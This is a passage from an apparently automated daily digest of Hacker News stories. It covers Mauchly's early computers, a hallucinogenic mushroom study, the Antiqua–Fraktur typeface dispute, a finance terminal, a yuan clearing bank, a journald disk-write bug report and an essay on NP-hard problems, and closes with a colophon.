by cainxinth·▲ 58 points·22 comments·uniqueatpenn.wordpress.com ↗
the world in which we live

As you are reading this post, you are almost certainly looking at a computer … a desktop, a laptop, a tablet, or a smartphone.  As I look around my shared workspace, I can see, without moving from my desk, 6 computers besides my own as well as a slew of smartphones.  This is simply the world in which we live.

ENIAC (Electronic Numerical Integrator and Computer), first general purpose electronic computer (invented at Penn, 1946, by John Mauchly and J. Presper Eckert), Ms. Coll. 925, box 205, folder 4

But the world in which John Mauchly and J. Presper Eckert were living in the early 1940s had no computers. The ENIAC, which they invented during the World War II years was from their imagination. Combined with math, engineering, and science knowledge and a pure will to solve problems, they created something utterly new.  It is mind boggling when you really stop and think about it.

In  1982, Joel L. Shurkin wrote, “rarely have so few people altered the world as much as [ENIAC’s] inventors, yet gained so little for having done so,” (page 33). And yet, while Mauchly and Eckert absolutely gained less than they should have, they continued to innovate and developed no less than three unique computers (BINAC, first electronic stored-program computer ever sold commercially; EDVAC, first modern computer designed from the ground up to store both instructions and data in its internal memory; and UNIVAC, the first commercial electronic computer). Mauchly added one more computer, the Skeduflo, to his portfolio after he started his own company, Mauchly Associates. In an article following his death in 1980, it was stated that Mauchly “unlocked the secrets that spawned an industry which will continue to change our world in remarkable ways” (Sperry/UNIVAC News, volume 4, number 4, page 1). 

Skeduflo, computer in a suitcase

UNIVAC I (Universal Automatic Computer), Ms. Coll. 925, box 172, Folder 9

EDVAC (Electronic Discrete Variable Automatic Computer), Ms. Coll. 925, Box 205, Folder 3

BINAC (Binary Automatic Computer), Ms. Coll. 925, Box 205, Folder 1

In a controversial move, I am going to say that while the ENIAC was revolutionary and a pivotal moment in the history of computing, my favorite part of John Mauchly’s papers is not the material related to the ENIAC, but  instead is the material related to the UNIVAC and especially from the UNIVAC Applications and Research Center (UARC), which Mauchly headed from 1953 to 1959, and which was “devoted to creating better methods of using the new equipment and exploring novel applications,” (Sperry UNIVAC Sphere, vol. 10, no. 1, 1980 January).

Today we take computers for granted … when faced with a problem, we think, how can a computer solve the problem faster and more accurately than a human slogging away.  Even when creating the ENIAC, that is what Mauchly and Eckert did … they needed to compute World War II ballistic firing tables and they knew, in their hearts and brains (not because it had been done before), that a computer could make that happen.

Are Computers Newsworthy? Written in 1951 with additions in 1955, Ms. Coll. 925, box 170, folder 20

What I love about Mauchly’s role in UARC is that he did the opposite.  Instead of looking to computers to solve problems, Mauchly looked for problems that could be solved by computers.  He used every ounce of imagination, creativity, thoughtfulness, and ingenuity to show the world that computers were newsworthy; that businesses, governments, and institutions should invest in them; and that computers were the future.  He had a bird’s eye view on what was necessary, what was possible, and what he needed to do to help things along. Because of this environment of innovation and ingenuity, Mauchly and his colleagues were enormously productive … records from this time period fill dozens of record center boxes and feature enormous progress in the development of the UNIVAC (Universal Automatic Computer) the world’s first general purpose commercial computer able to handle a wide variety of applications.  At the same time, the team that Mauchly assembled was a driving force in the field of programming—Admiral Grace Murray Hopper was one such pioneer in computer programming and her work helped pave the way for modern data processing.

Meet the Computer Industry’s “First Citizens,” Ms. Coll. 925, Box 172, Folder 9

Mauchly did not stop with his successes with the UNIVAC … instead, he and a colleague went on to create Skeduflo, a computer in a suitcase to work with Critical Path Method (CPM), a system for construction scheduling by computer.  In the promotion that followed, Mauchly was interviewed and predicted (in 1967) that businessmen would be carrying computers around in their pockets by 1980.  He was a little ambitious, but I am guessing that many of the readers of this post are carrying a computer in your pockets.  The ENIAC filled the basement of the Moore School … how did the man that created that computer also anticipate a computer that would fit in a pocket? 

John Mauchly at work, Ms. Coll. 925, Box 206, Folder 5

Following Mauchly’s death, J. Presper Eckert gave a eulogy in which he stated:  “the first thing that comes to my mind when I think of John is that the was certainly one of the most brilliant people I ever knew. But I think brilliant is a cold word. And for all his being brilliant, I think it is more important to say that John was a good man.” (SperryUNIVAC News, Vol. 4, No. 4, page 6). 

Come visit the Kislak Center and get to know this brilliant and good man through his rich and immense collection. Or read other blog posts about him: not only was he brilliant and good, he was also heaps of fun!

Works cited:

“Dr. John Mauchly: Chairman of the Board,” (biographical sketch) (box 202, folder 12)

“It’s a better world, thanks to John,” SperryUNIVAC News, Volume 4, Number 4, February 1980 (box 202, folder 12)

“John Mauchly dies.” Sperry UNIVAC Sphere, Volume 10, Number 1, January 1980 (box 202, folder 12)

The Daily Front Page 21 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — A Curious Fungus
article

Mushroom behind 'tiny people' hallucinations identified

by wglb·▲ 270 points·266 comments·phys.org ↗
vivid visions of tiny humans moving through and interacting with the physical world around them

Mushroom behind 'tiny people' hallucinations identified

Lanmaoa asiatica is a popular edible mushroom species sold in Yunnan that induces Lilliputian hallucinations when undercooked. Locals call it Jian shou quing, which translates to “turns blue in the hand” to reference its rapidly changing colors when touched. Credit: Colin Domanauer/NHMU

People in communities thousands of miles apart have described the same strange experience after eating a mysterious mushroom: vivid visions of tiny humans moving through and interacting with the physical world around them. Known as Lilliputian hallucinations—a reference to the 6-inch-tall inhabitants of "Gulliver's Travels"—the phenomenon has long been thought to stem from cultural influences rather than biology.

A new study suggests otherwise.

Using DNA sequencing, University of Utah (U) researchers confirmed that a single mushroom species, Lanmaoa asiatica, is responsible for these hallucinations in Southwest China and the northern Philippines.

They also discovered that the mushroom contains none of the psychoactive compounds known to science, including psilocybin. Instead, the findings point to an entirely new hallucinogenic compound that could offer new insights into neurological disease and how the brain shapes perception and consciousness.

Colin Domnauer, a doctoral student at the U, and Bryn Dentinger, a mycologist at the U and the Natural History Museum of Utah, coauthored the study that was published June 5, 2026, in the journal Mycologia.

Domnauer spoke to @theU about the Lilliputian mushroom, the decades-long mystery behind it and the implications of a new hallucinogenic compound.

People have reported Lilliputian hallucinations for nearly a century, yet the mushroom behind them remained a mystery. How did you finally identify it?

In 1934, Western scientists first heard reports from Papua New Guinea of people hallucinating tiny humans after eating wild mushrooms, a phenomenon they dubbed "mushroom madness."

Anthropologists and mycologists went to Papua New Guinea in the 1950s and 1960s, narrowing the culprit to a few species in the Boletaceae (bolete) family. They did some chemical analyses but couldn't find any psychoactive components. They even sent samples to Albert Hoffman, who first isolated psilocybin and discovered LSD, but even he couldn't find an active compound.

Eventually, they concluded that maybe these mushrooms weren't bioactive at all—maybe this was all just a sociocultural phenomenon. So, research really ended in the 1960s.

Decades later, in the 1990s, there were reports from Yunnan in Southwest China of a very similar phenomenon after people ate bolete mushrooms. The species wasn't clear, but mycologists suggested that it might be L. asiatica, then a newly described mushroom.

In 2024, I heard similar accounts from an Indigenous community in the Philippines' remote Northern Cordillera region who were consuming a wild mushroom called "Sedesdem" that, according to local knowledge, occasionally caused visions of little people. Known as the "Nonda" in Papua New Guinea and "Jian shou qing" in Yunnan, it's a culturally important edible mushroom that, if undercooked, would produce the hallucinations.

That was the third independent case linking a wild mushroom to visions of little people.

I went to Yunnan and the Philippines, spoke with locals and collected L. asiatica and as many specimens in the Lanmaoa genus as I could find for DNA sequencing. That was the first scientific survey of Northern Philippine fungi that had ever been done.

It turns out that China's Jian shou qing and the Philippines' Sedesdem were both L. asiatica—which was very surprising because at the time, we thought L. asiatica only occurred in China. Unfortunately, when Dentinger traveled to Papua New Guinea, unusually dry conditions prevented us from collecting specimens for comparison.

Now, three completely independent cultures have reported the same specific type of hallucination, and two cases are attributed to the same DNA-verified mushroom species. That indicates that these bizarre psychological effects aren't cultural manifestations or coincidences—they must have a shared underlying chemical and neurological basis.

What makes the hallucinations so unusual?

People pretty much always report seeing dozens or hundreds of little people, about 3 to 30 centimeters tall (1 to 12 inches), in incredible detail, like they're actually there. About 90% of people describe them as little elves or clowns or other fairy-like figures dressed in colorful clothes.

What's fascinating is they interact with the physical world using the laws of physics that govern us. They're not walking through walls or anything. They're falling off the edge of tables, walking around objects. One person told me that while they were eating soup, the little people were jumping off their spoon into the bowl and swimming around. As they scooped a bite, the little people remained in their mouth.

Why do you think L. asiatica has different compounds than other psychedelic mushrooms?

We searched inside the mushroom, both chemically and genetically, for the presence of any known psychoactive mushroom compounds, and we found absolutely no trace of them. This wasn't too surprising, as the strange symptoms are quite unlike any known drug.

Why is the prospect of a new psychoactive compound exciting?

Lilliputian hallucinations predate this mushroom. There are myths about tiny people in pretty much every culture's folklore. People have also reported these hallucinations from alcohol withdrawal, dementia, macular degeneration and other neurological conditions. So, it seems like this phenomenon is fundamental to how the human mind and brain work, but we don't know what causes it or how to treat it.

That's what makes this mushroom different—it reliably produces this effect, whereas those conditions very rarely trigger it. If L. asiatica has some compound that can reliably induce these hallucinations, it could be a very powerful tool for understanding the mechanisms behind them.

Our next step is to isolate and identify that new psychedelic compound.

Your study is the first comprehensive genomic analysis of all Lanmaoa species. What else did you find?

I wanted to understand the diversity and evolution of this whole Lanmaoa group of mushrooms. So, we collected specimens from around the globe and sequenced the genomes of 53 specimens from the wild and fungarium collections. We found that there were 17 species in this group, including four new species, two of which came from existing U.S. collections.

Our analysis showed that L. asiatica is the only psychoactive species in this genus. Now we're building an evolutionary map to understand how this trait evolved and whether related species produce similar compounds.

I think one of the most exciting findings is that there was so much hidden diversity sitting in museum collections that we never would have recognized without DNA sequencing. It reveals how much biological novelty is hiding in plain sight, waiting to be discovered.

Fungi are extremely underexplored. Why do you think it's important to expand our biodiversity knowledge?

We're just scratching the surface of the fungal kingdom. Look at penicillin—that was isolated from a fungus and was probably the most revolutionary medicine of the last century. Who knows what other miracle medicines or revolutionary understandings we'll find by exploring nature.

The Daily Front Page 22 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — The Font Wars
article

Antiqua–Fraktur dispute

by buzzy_hacker·▲ 147 points·71 comments·en.wikipedia.org ↗
The Antiqua–Fraktur dispute was a typographical dispute in 19th- and early 20th-century Germany.

Schriftzug Antiqua

The "Latin script" was typified by Antiqua.

Schriftzug Fraktur

The "German/Gothic script" (blackletter) was embodied by Fraktur.

The Antiqua–Fraktur dispute was a typographical dispute in 19th- and early 20th-century Germany.

In most European countries, blackletter typefaces like the German Fraktur were displaced by the creation of the Antiqua typefaces in the 15th and 16th centuries. However, in Germany and Austria, the two styles of printing coexisted until the first half of the 20th century.

During that time, both styles gained ideological connotations in Germany, which led to long and heated disputes on what was the "correct" typeface to use. The eventual outcome was that the Antiqua-style typefaces prevailed when the Nazi Party chose to put an end to the use of Fraktur in favor of "normal typeface" (German: Normalschrifterlaß).

Origin

Initialen

Two typefaces: the German text uses Fraktur; numerals and Latin and French words are written in Antiqua (1768).

Historically, the dispute originates in the differing use of these two typefaces in most intellectual texts. Whereas Fraktur was preferred for works written in German, for Latin texts the Antiqua-style typefaces were normally used. This extended even to English–German dictionaries; the English words would all be written in Antiqua, and the German words in Fraktur. Originally this was simply a convention.

19th century

Conflict over the two typeface styles first came to a head after the occupation of Germany and dissolution of the Holy Roman Empire by Napoleon in 1806, which led to a period in the history of Germany in which nationalists began to attempt to define cultural values common to all Germans. There was a massive effort to canonize the German national literature—for example, the Grimm Brothers' collection of fairy tales—and to create a unified German grammar.

In the context of these debates, the two styles became increasingly polarized: Antiqua typefaces were seen as "un-German", and using them took on connotations of "shallow", "light", and "not serious". In contrast, Fraktur, with its much darker and denser script, was viewed as representing allegedly German virtues such as depth and sobriety.

During the Romantic Era, in which the Middle Ages were glorified, Fraktur additionally gained the (historically incorrect) interpretation that it represented German Gothicism. For instance, Goethe's mother advised her son to refrain from using the un-German Antiqua “for God’s sake”.

Otto von Bismarck was a keen supporter of German typefaces. He went so far as to refuse gifts of German books in Antiqua typefaces and returned them to sender with the statement Deutsche Bücher in lateinischen Buchstaben lese ich nicht! ('I don't read German books in Latin letters!').[1]

20th century

The dispute between Antiqua and Fraktur continued well into the 20th century. Arguments for Fraktur were not only based on historical and cultural perceptions, but also on the claim that Fraktur was more suited for printing German and other Germanic languages, as their proponents claimed it to be more readable than Antiqua for this purpose.

A 1910 publication by Adolf Reinecke, Die deutsche Buchstabenschrift, claims the following advantages for using Fraktur as the German script:

  • German script is a real reading script: it is more readable, i.e. the word images are clearer, than Latin script.[2]
  • German script is more compact in printing, which is an advantage for fast recognition of word images while reading.
  • German script is more suitable for expressing German language, as it is more adapted to the characteristics of the German language than the Latin script.
  • German script does not cause nearsightedness and is healthier for the eyes than Latin script.[3]
  • German script is still prone to development; Latin script is set in stone.
  • German script can be read and understood all over the world, where it is actually often used as ornamental script.
  • German script makes it easier for foreigners to understand the German language.[4]
  • Latin script will gradually lose its position as international script through the progress of the Anglo-Saxon world (here the author states that "Anglo-Saxons in the UK, the United States and Australia are still 'Germanic' enough to annihilate the Latin-scriptler's dream of a Latin 'world-script'").[5]
  • The use of Latin script for German language will promote its infestation with foreign words.
  • German script does not impede at all the proliferation of German language and German culture in other countries.

On 4 May 1911, a peak in the dispute was reached during a vote in the Reichstag. The Verein für Altschrift ("Association for Antiqua") had submitted a proposition to make Antiqua the official typeface (Fraktur had been the official typeface since the foundation of the German Empire) and no longer teach Kurrent (blackletter cursive) in the schools. After a long and, in places, very emotional debate, the proposition was narrowly rejected 85–82.

Nazi period

Nazis had a complex and variable relationship with Fraktur. Adolf Hitler personally disliked it. In fact, as early as 1934 he denounced its continued use in a speech to the Reichstag:[6]

Your alleged Gothic internalization does not fit well in this age of steel and iron, glass and concrete, of womanly beauty and manly strength, of head raised high and intention defiant [...] In a hundred years, our language will be the European language. The nations of the east, the north and the west will, to communicate with us, learn our language. The prerequisite for this: The script called Gothic is replaced by the script we have called Latin so far [...]

Nonetheless, Fraktur typefaces were particularly heavily used during the early years of the Nazi era, when they were initially represented as true German script. In fact, the press was scolded for its frequent use of "Roman characters" under "Jewish influence", and German émigrés were urged to use only "German script".[7] However, Hitler's distaste for Fraktur saw it officially discontinued in 1941 in a Schrifterlass ("edict on script") signed by Martin Bormann, which asserted that it was falsely called "Gothic" and actually consisted of Schwabacher Judenlettern ("Jewish letters").[8]

One of the motivations seems to have been compatibility with other European languages. The edict mentions publications destined for foreign countries, Antiqua would be more legible to those living in the occupied areas; the impetus for a rapid change in policy probably came from Joseph Goebbels and his Propaganda Ministry.[9] Readers outside German-speaking countries were largely unfamiliar with Fraktur typefaces. Foreign fonts and machinery could be used for the production of propaganda and other materials in local languages, but not so easily in German as long as the official preference for Fraktur remained.

Schrifterlass Antiqua1941

Normalschrifterlass by Martin Bormann

Bormann's edict of 3 January 1941 at first forbade only the use of blackletter typefaces. A second memorandum banned the use of Kurrent handwriting, including Sütterlin, which had only been introduced in the 1920s. From the academic year 1941/42 onwards, only the so-called Normalschrift ("normal script"), which had hitherto been taught alongside Sütterlin under the name of "Latin script", was allowed to be used and taught. Kurrent did remain in use until 1945 for some applications such as cloth military insignia badges.

After the Second World War

After the war, the Sütterlin script was once again taught in the schools of some states of Germany as an additional script, but it could not hold out against the usage of Latin cursive scripts. As a consequence, most Germans find it difficult to decipher their own grandparents' letters, diaries, or certificates.

However, the Fraktur script remains present in everyday life in some pub signs, beer brands and other forms of advertisement, where it is used to convey a certain sense of rusticity and oldness (compare the English ye olde). However, many of these deviate from the traditional letterforms, specifically in the frequent untraditional use of the round s instead of the long s (ſ) at the beginning of a syllable, the omission of ligatures, and the use of letter-forms more similar to Antiqua for certain especially hard-to-read Fraktur letters such as k. Books wholly printed in Fraktur are nowadays read mostly for particular interests. Since many people have difficulty understanding blackletter, they may have trouble accessing older editions of classic works in German.

A few organizations such as the Bund für deutsche Schrift und Sprache [de] continue to advocate the use of Fraktur typefaces, highlighting their cultural and historical heritage and their advantages when used for printing Germanic languages. But these organizations are small, somewhat sectarian, and not particularly well known in Germany.

In the United States, Mexico, and Central America, Old Order Amish, Old Order Mennonite, Old Colony Mennonite, and Hutterite schools still teach the Kurrent handwriting and Fraktur script. Many German books printed by Amish and Mennonite printers use the Fraktur script.

References

  1. Reinecke 1910, p. 79.
  2. Reinecke 1910, pp. 42, 44.
  3. Reinecke 1910, pp. 42, 49.
  4. Reinecke 1910, pp. 58–59.
  5. Reinecke 1910, p. 62.
  6. "Fraktur: German Typefaces in World War II". penelope.uchicago.edu. Retrieved 12 May 2025.
  7. Michaud 2004, pp. 208, 215–216.
  8. "Bormann-Original-Schreiben". ligaturix.de. Retrieved 11 August 2026.
  9. Michaud 2004, pp. 216–217.

Sources

Further reading

  • Bain, Peter; Shaw, Paul, eds. (1998). Blackletter: type and national identity. New York, NY: Princeton Architectural Press and Cooper Union for the Advancement of Science and Art. ISBN 978-1-56898-125-3.
  • Hartmann, Silvia (1998). Fraktur oder Antiqua: der Schriftstreit von 1881 bis 1941 (Fraktur vs Antiqua: the tyopgraphical dispute from 1881 to 1941) (in German). Frankfurt am Main: Lang. ISBN 3-631-33050-2.
  • Kapr, Albert (1993). Fraktur, Form und Geschichte der gebrochenen Schriften (Fraktur, form and history of blackletter typefaces) (in German). Mainz: Verlag Hermann Schmidt. ISBN 3-87439-260-0.
  • Killius, Christina (1999). Die Antiqua-Fraktur Debatte um 1800 und ihre historische Herleitung (The Antiqua-Fraktur debate around 1800 and its historical derivation) (in German). Wiesbaden: Harrassowitz Verlag. ISBN 3-447-03614-1.

External links

The Daily Front Page 23 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Terminals, Documents & Donkeys
article

Gloomberb

by rbanffy·▲ 402 points·207 comments·gloom.sh ↗

Open-source finance terminal. Fast, keyboard-driven and extensible. Available as a desktop app or TUI.

Download for Windows

TUI

Gloomberb terminal showing portfolio, watchlists, market data, and chart panels.

Open the pane you need. Keep moving.

Gloomberb is command-bar first. Type a ticker or a shortcut like DES AAPLor TOP and jump straight into the market view.

Research companies

Quotes, charts, financials, filings, holders, insiders, options, analyst ratings, events, and relative valuation.

Follow markets

Ranked stories, breaking news, sector feeds, global indices, FX, macro events, yield curves, movers, and sentiment.

Run a workspace

Portfolios, watchlists, broker connections, alerts, notes, AI screens, prediction markets, and Gloom Cloud chat.

Gloomberb functions

DES

Security details for a ticker.

DES function screenshot

QQ

Ticker quote.

QQ function screenshot

PM

Polymarket and Kalshi prediction data.

PM function screenshot

TOP

Ranked market stories.

TOP function screenshot

MOST

Top gainers, losers, and active tickers.

MOST function screenshot

HM

Market heatmap for large US stocks and ETFs.

HM function screenshot

WEI

Global equity indices.

WEI function screenshot

ECON

Economic events and releases.

ECON function screenshot

CMP

Ticker charts.

CMP function screenshot

CORR

Ticker return correlations.

CORR function screenshot

ANR

Analyst targets and ratings.

ANR function screenshot

HDS

Institutional holders.

HDS function screenshot

RV

Relative valuation.

RV function screenshot

13F

Institutional fund filings and holdings.

13F function screenshot

SEC

SEC filings and company disclosures.

SEC function screenshot

TWIT

Ticker-related market posts.

TWIT function screenshot

OMON

Options monitor.

OMON function screenshot

PORT

Portfolio risk and sector exposure.

PORT function screenshot

NOTE

Notes scratchpad.

NOTE function screenshot

GC

Yield curve.

GC function screenshot

SP

S&P 500 sector performance.

SP function screenshot

FXC

Major FX cross rates.

FXC function screenshot

FNG

Fear and greed market gauge.

FNG function screenshot

ALRT

Price alerts.

ALRT function screenshot

CG

Congress trading disclosures.

CG function screenshot

TBO

TheBuildout infrastructure intelligence.

TBO function screenshot

CHAT

Gloomberb Cloud chat.

CHAT function screenshot

Get Gloomberb as a desktop app or install the TUI.

Download for Windows

TUI

The Daily Front Page 24 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Terminals, Documents & Donkeys
article

Donkey.bas is 45 Years Old – 131 line of Glory

by jkrauska·▲ 212 points·102 comments·donkeybas.com ↗

A browser port of the 1981 IBM PC classic, for its 45th birthday.

About

DONKEY.BAS shipped with early IBM PC DOS as a demo of color graphics and sound in BASICA. It was written by Microsoft co-founder Bill Gates and Neil Konzen in 1981 (version 1.10 in 1982). You only switch lanes — avoid the donkey, or BOOM.

This page recreates the original CGA gameplay in JavaScript with some liberties. Original source: DONKEY.BAS · GitHub

The Daily Front Page 25 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Markets & Machines
article

Deutsche Bank becomes first foreign yuan clearing bank in Europe

by Markoff·▲ 394 points·421 comments·tradersunion.com ↗

Deutsche Bank becomes first foreign yuan clearing bank in Europe

Deutsche Bank gains European yuan clearing role

​China has authorized Deutsche Bank to clear renminbi transactions in Europe, giving a foreign lender a role previously handled in the region by Chinese banks. The appointment adds Frankfurt to Beijing's effort to build a broader infrastructure for using the yuan in international trade and investment.

Highlights

  • Deutsche Bank will clear renminbi transactions from Frankfurt.
  • It is the first foreign institution in Europe to receive the designation.
  • China is widening its overseas yuan network.
  • European companies could gain another route for yuan payments.

The designation followed a memorandum of understanding between Deutsche Bank and the People’s Bank of China. Deutsche Bank will conduct renminbi clearing operations from Frankfurt, becoming the first foreign institution in Europe to receive such status, according to a statement from China’s central bank.

Frankfurt joins China's yuan network

European renminbi clearing has until now relied on Chinese lenders, including Bank of China, Industrial and Commercial Bank of China, and China Construction Bank. Their European operations process payments from financial centers including Frankfurt, London, Paris, Budapest, and Luxembourg.

Bringing Deutsche Bank into that network gives Beijing access to the international reach of a major European lender. Deutsche Bank already operates substantial payments infrastructure from Frankfurt and describes itself as the leading euro clearer, alongside its U.S. dollar clearing operations.

The appointment also builds on an existing relationship between the German bank and Chinese monetary authorities. In 2019, the PBoC approved a Deutsche Bank model that allowed its branches worldwide to provide onshore renminbi foreign-exchange services through Hong Kong as a central hub.

For European companies with Chinese suppliers and operations, direct yuan settlement can reduce the need to route transactions through another currency. Demand has been particularly relevant for businesses in manufacturing, automobiles, and green technology, sectors where European companies maintain extensive commercial links with China.

Beijing broadens the renminbi footprint

The Frankfurt appointment fits a broader campaign to increase international use of the Chinese currency. China has recently extended renminbi-clearing roles to foreign institutions in other regions, while its Cross-Border Interbank Payment System has been adding international banks as direct participants.

That expansion is intended to make yuan payments easier outside mainland China and reduce dependence on payment routes centered on the dollar. The immediate effect is more practical than transformational: another major bank can now provide settlement infrastructure to companies conducting business with China.

For Deutsche Bank, the designation strengthens a payments franchise that already spans multiple currencies. For Beijing, the significance lies in placing renminbi clearing inside the network of a large European institution rather than relying exclusively on overseas branches of Chinese banks.

The move does not by itself challenge the dollar's or euro's dominant international roles. It does, however, broaden the plumbing needed for companies to invoice, settle, and invest directly in renminbi, a necessary condition if China wants the currency to play a larger role beyond its borders.

Earlier, we reported that Deutsche Bank expands Ripple partnership to modernize cross-border payments.

The Daily Front Page 26 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Markets & Machines
repository

Single log line is 49KB+ (ext4) / 110KB+ (btrfs) of systemd-journald disk writes

by ValdikSS·▲ 178 points·114 comments·github.com ↗
★ 16,594⑂ 4,624 forks C

The systemd System and Service Manager

Description

systemd version the issue has been seen with

257.9

Used distribution

Debian 13

Linux kernel version used

6.12.57+deb13-amd64

Component

systemd-journald

Expected behaviour you didn't see

Log writes should be within order of magnitude of syslog

Unexpected behaviour you saw

VM doing ~50 IOPS when writing 2 lines of log per second

Steps to reproduce the problem

this is exactly same issue #15292 that was closed without good reason

Step 1. Use journald in mode where it writes to hard drive. The FS is XFS

Step 2. have constant stream of log entries going on a VM

Jan 03 13:37:01 cthylla haproxy[727]: 192.168.1.1:48550 [03/Jan/2026:13:37:01.392] f_www b_icinga/web 0/0/0/6/6 302 153 - - ---- 2/2/0/0/0 0/0 "GET / HTTP/1.0"
Jan 03 13:37:03 cthylla haproxy[727]: 192.168.1.1:36892 [03/Jan/2026:13:37:03.403] f_www b_icinga/web 0/0/0/7/7 302 153 - - ---- 2/2/0/0/0 0/0 "GET / HTTP/1.0"
Jan 03 13:37:05 cthylla haproxy[727]: 192.168.1.1:36904 [03/Jan/2026:13:37:05.416] f_www b_icinga/web 0/0/0/6/6 302 153 - - ---- 2/2/0/0/0 0/0 "GET / HTTP/1.0"
Jan 03 13:37:07 cthylla haproxy[727]: 192.168.1.1:36906 [03/Jan/2026:13:37:07.427] f_www b_icinga/web 0/0/0/6/6 302 153 - - ---- 2/2/0/0/0 0/0 "GET / HTTP/1.0"
Jan 03 13:37:09 cthylla haproxy[727]: 192.168.1.1:36912 [03/Jan/2026:13:37:09.439] f_www b_icinga/web 0/0/0/7/8 302 153 - - ---- 2/2/0/0/0 0/0 "GET / HTTP/1.0"
Jan 03 13:37:11 cthylla haproxy[727]: 192.168.1.1:36918 [03/Jan/2026:13:37:11.454] f_www b_icinga/web 0/0/0/6/6 302 153 - - ---- 2/2/0/0/0 0/0 "GET / HTTP/1.0"
Jan 03 13:37:13 cthylla haproxy[727]: 192.168.1.1:45832 [03/Jan/2026:13:37:13.465] f_www b_icinga/web 0/0/0/7/7 302 153 - - ---- 2/2/0/0/0 0/0 "GET / HTTP/1.0"
Jan 03 13:37:15 cthylla haproxy[727]: 192.168.1.1:45848 [03/Jan/2026:13:37:15.476] f_www b_icinga/web 0/0/0/6/6 302 153 - - ---- 2/2/0/0/0 0/0 "GET / HTTP/1.0"
Jan 03 13:37:17 cthylla haproxy[727]: 192.168.1.1:45856 [03/Jan/2026:13:37:17.488] f_www b_icinga/web 0/0/0/6/6 302 153 - - ---- 2/2/0/0/0 0/0 "GET / HTTP/1.0"
Jan 03 13:37:19 cthylla haproxy[727]: 192.168.1.1:45862 [03/Jan/2026:13:37:19.500] f_www b_icinga/web 0/0/0/6/6 302 153 - - ---- 2/2/0/0/0 0/0 "GET / HTTP/1.0"

Step 3. Observe the VM IO traffic.

Image

I used VM as example because the complaint in #15292 was "iotop is not accurate" (I can believe that, it's before any OS write coaelscing) but this clearly shows traffic after every kernel mechanism was used. So no, it isn't "kernel making lotsa iops out of it", it's slow.

Journald just uses extremely inefficient format (also I've seen it corrupt on unclean reboot enough times to declare it's not even all that resilient) as files are also multiple times the size of what's actually written in them.

The Daily Front Page 27 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Markets & Machines
article

NP-overrated

by theanonymousone·▲ 184 points·114 comments·gruhn.me ↗

If you learned about NP-hard problems in university, your takeaway was probably this:

NP-hard problems are solvable in theory but it's hopelessly expensive in practice. It's basically proven that no good algorithms exist.

At least that's what I took away. And almost everyone I've talked to. And many people online. I keep seeing "No you can't do it. It's NP-hard. Blah blah" discussions. The myth is pervasive but these problems are not intractable.

At the time, my professor closed the final lecture with dramatic words (I'm paraphrasing slightly):

And now you've learned that almost all interesting problems are undecidable and of the remaining ones, almost all are NP-hard. For the project of computer science, that puts the final nail in the coffin.

Sheesh. Not sure if everyone got such a dire framing but that would explain.

The theory is not wrong, but in practice it's often irrelevant. Sure, any algorithm you can come up with will blow up on some inputs. But you might get a fast solution on 99.9% of inputs. Or 100% of the remotely relevant inputs. The theory does not rule that out.

In theory, there is no difference between theory and practice. But in practice, there is.

-- Benjamin Brewster

A few prominent NP-hard problems:

  1. Dependency resolution (in package managers)
  2. Type checking (not all type systems)
  3. Scheduling
  4. Traveling Salesman
  5. Boolean Satisfiability (SAT)

For (1) and (2), the worst-case just doesn't occur. I mean, installing packages and type checking can surely be slow. But, at least in my career, I've never seen a galactic blow-up.

(3) and (4) are technically optimization problems. Everyone knows you can tackle those with heuristics, but you don't have to sacrifice optimality. We absolutely have tools that can find provably optimal solutions in reasonable time. There's no magic. No quantum computers. Just thinking harder and coming up with better algorithms. And that's what people have done. In fact, algorithmic speedup has outpaced hardware gains in the last decades. Taken together, this paper cites a 450-billion-fold speedup between 1991 and 2015.

Last but not least: even (5), the archetype of NP-hard problems, is routinely solved at scale. Amazon is solving a billion SMT problems a day. SMT is an even harder version of SAT. The SAT algorithms have gotten so good, it's now considered the easy part.

But what if you run into the worst-case? You don't have to wait for the heat-death of the universe. An HTTP request also doesn't come back sometimes. Add a timeout, show an error message, ... you know the drill.

The Daily Front Page 28 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Also on the Front Page
The Daily Front Page 29 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Colophon

That's the Front for Today

Issue No. #260813 — Thursday, August 13, 2026 — went to press 2026-08-14 at 06:02 UTC.

About This Magazine

The Daily Front is a daily digital magazine assembled from the stories that reached the front page of Hacker News on Thursday, August 13, 2026. Headlines, points, and comment counts are recorded as they stood at press time. All articles remain the property of their original authors — every piece links back to its source and its discussion thread.

How It Was Made

Fetched, cleaned, and typeset by an automated pipeline. An editor model laid out the pages, chose the highlights, and briefed the cover illustrator — 31 model calls and 300k tokens in total. Set in Jacquard 12, Playfair Display, Source Serif 4, and IBM Plex Mono, all served via Google Fonts under the SIL Open Font License.

The Cover

The cover illustration was commissioned with this prompt:

A single expansive scene inside a nocturnal engineering workshop: a glowing server rack and a sleek workstation dispatch streams of light toward a small autonomous mechanical assistant assembling code-like circuit paths, while in the background an exposed motherboard has luminous tangled memory traces spilling into a carefully organized archival vault. A vintage beige personal computer, a tiny green mushroom under a glass dome, and a ticker-like financial console sit on side benches, suggesting computing past and present. No text, letters, logos, or readable screens.

Constructivist paper-cut abstraction in large interlocking planes, using only vermilion, charcoal, and ivory: compose one expansive nocturnal workshop as a unified directional system, with the glowing server rack and sleek workstation sending angular light streams toward the small autonomous mechanical assistant, whose compact forms assemble code-like circuit paths; retain the background motherboard as a radiating junction spilling luminous tangled traces into a sharply ordered archival-vault grid, while reduced side-plane symbols preserve the vintage beige computer, domed tiny mushroom, and ticker-console relationships without text, letters, logos, or readable screens.

Absolutely no text, letters, numbers, readable symbols, or logos anywhere in the image.

Production Ledger

StageModelCallsTokens InTokens Out
extractgpt-5.6-luna 28 171,022 100,678
layoutgpt-5.6-terra 1 19,567 2,102
covergpt-5.6-luna 1 342 119
covergpt-image-2 1 238 5,488

The Publisher

Published by Johnny.

Support the Press

If The Daily Front brightens your morning, consider supporting its publisher.

Credits & Contact

All content — articles, posts, comments, and the images within them — belongs to its original authors and is reproduced here to point readers back to the source. Full credit goes to those creators; every item links to its original and its Hacker News discussion.

If you are an author and would like your content removed from an issue, write to hi@johnnys.page and it will be taken down.

Feedback is always welcome at the same address: hi@johnnys.page.

Credit where credit is due.

